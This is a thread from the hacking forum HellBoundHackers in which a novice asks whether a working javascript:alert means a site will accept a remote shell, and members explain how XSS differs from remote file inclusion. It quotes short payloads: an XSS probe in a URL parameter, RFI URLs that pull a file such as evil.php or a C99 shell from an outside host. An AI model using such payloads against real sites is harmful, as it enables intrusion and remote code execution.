Follow us on Twitter!
Understanding is the answer, hatred is the problem, and hackers are the slaves abused and destroyed in the process of peace online - Deshouleres
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 23
Guests Online: 21
Members Online: 2

Registered Members: 82839
Newest Member: fezphantom
Latest Articles
View Thread

HellBound Hackers | HellBound Hackers | Questions

Author

Does javascript alert always mean


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-06-08 00:51
Hey, I was just curious to know if when javascript:alert is used and works on a site. Does this always mean that you can run a shell through the site or not all the time?


Author

RE: Does javascript alert always mean

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 19-06-08 00:53
It means you don't understand a thing about the subject you are studying.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: Does javascript alert always mean


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-06-08 00:55
Thats what I figured.


Author

RE: Does javascript alert always mean


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-06-08 01:28
yeah man learn a bit about javascript injections. things will make more sense then.

to answer your question directly, no.

javascript injections have nothing to do with running a shell on a site.


Author

RE: Does javascript alert always mean


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-06-08 05:28
No man, sorry. Thats not what I mean. I was saying would the fact that javascript:alert works. Does this mean I could inject a shell such as C99 through a javascript snippet which runs the remote page locally.
Like ?page=www.site.com/shell


Author

RE: Does javascript alert always mean


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-06-08 06:09
Nope. Think about it logically. You can javascript:alert any page (like for example this hbh page) so it wouldn't make much sense if you could then open up a shell on hbh because it is obviously a pretty secure website. If it was that easy there'd be nothing to taking over any site.


Author

RE: Does javascript alert always mean

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 19-06-08 08:14
right all your doing is saying "make a popup"


Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.


img259.imageshack.us/img259/3713/sigr.png

yours31f@live.com yours31f@yahoo.com rpwd.info
Author

RE: Does javascript alert always mean

GTADarkDude
Member



Posts: 142
Location: The Netherlands
Joined: 23.02.08
Rank:
Newbie
Posted on 19-06-08 09:23
I think that's not what he means either. I think that what he asks is when a page is vulnerable to XSS, which you can test with a JavaScript alert, whether you can also include a C99 shell. Am I right?


...
- - -
Author

RE: Does javascript alert always mean


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-06-08 09:36
index.php?id=<script>alert("abc");</script>

While the above may work, the bellow may not, and vice versa.

index.php?id=http://www.mysite.com/evil.php


Author

RE: Does javascript alert always mean

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 19-06-08 10:01
This thread made me confused, but I suppose the answer you're looking for is something like this:

"Just because you can put javascript injections in the URL bar no matter what site you're visiting, it doesn't mean the site is vulnerable to RFI. Javascript is client-side scripts and PHP is server-side."



img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/